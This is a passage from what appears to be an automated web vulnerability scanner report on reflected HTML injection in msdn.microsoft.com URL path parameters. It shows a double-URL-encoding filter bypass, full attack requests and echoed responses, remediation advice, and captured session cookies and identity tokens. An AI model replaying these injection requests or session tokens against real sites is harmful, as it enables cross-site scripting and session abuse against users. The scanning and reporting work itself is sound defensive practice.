<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us757a2"><a>39c3f7167ab/library/bb726434(office.12" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea44%2522%253e%253ca%253efa3efb9bd47 was submitted in the REST URL parameter 2. This input was echoed as 6ea44"><a>fa3efb9bd47 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6ea44%2522%253e%253ca%253efa3efb9bd47/bb726434(office.12 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:54 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6ea44"><a>fa3efb9bd47/bb726434(office.12" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7fbc%2522%253e%253ca%253eb1e36bffcd2 was submitted in the REST URL parameter 3. This input was echoed as d7fbc"><a>b1e36bffcd2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726434(office.12d7fbc%2522%253e%253ca%253eb1e36bffcd2 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:03 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12d7fbc"><a>b1e36bffcd2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a56b8%2522%253e%253ca%253ec3a0e51bb21 was submitted in the REST URL parameter 1. This input was echoed as a56b8"><a>c3a0e51bb21 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa56b8%2522%253e%253ca%253ec3a0e51bb21/library/bb726434(office.12).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:23 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa56b8"><a>c3a0e51bb21/library/bb726434(office.12)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98201%2522%253e%253ca%253e9d927c0b48e was submitted in the REST URL parameter 2. This input was echoed as 98201"><a>9d927c0b48e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library98201%2522%253e%253ca%253e9d927c0b48e/bb726434(office.12).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:40 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library98201"><a>9d927c0b48e/bb726434(office.12)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae2f%2522%253e%253ca%253e4fee7d32026 was submitted in the REST URL parameter 3. This input was echoed as dae2f"><a>4fee7d32026 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726434(office.12).aspxdae2f%2522%253e%253ca%253e4fee7d32026 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9231 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12).aspxdae2f"><a>4fee7d32026" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16d6%2522%253e%253ca%253edf793d40793 was submitted in the REST URL parameter 1. This input was echoed as f16d6"><a>df793d40793 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf16d6%2522%253e%253ca%253edf793d40793/library/bb871518.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 